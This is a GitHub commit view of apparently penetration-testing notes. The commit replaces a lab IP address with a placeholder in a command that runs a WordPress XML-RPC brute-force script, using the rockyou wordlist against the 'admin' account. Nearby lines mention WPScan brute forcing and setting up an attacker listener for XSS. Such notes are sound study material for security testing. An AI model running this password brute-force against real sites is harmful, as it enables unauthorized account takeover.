We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 61bcd35 commit a5e2489Copy full SHA for a5e2489
07 - HTTP
@@ -79,7 +79,7 @@ WPScan brute force known user account.
79
xmlrpc.php
80
https://null-byte.wonderhowto.com/how-to/gain-control-wordpress-by-exploiting-xml-rpc-0174864/
81
82
-/wordpress-xmlrpc-brute-v2.py http://10.11.1.251/wp/xmlrpc.php /usr/share/wordlists/rockyou.txt admin
+/wordpress-xmlrpc-brute-v2.py http://<IPADDRESS>/wp/xmlrpc.php /usr/share/wordlists/rockyou.txt admin
83
84
-------------------- XSS --------------------
85
On attacker machine set listener
0 commit comments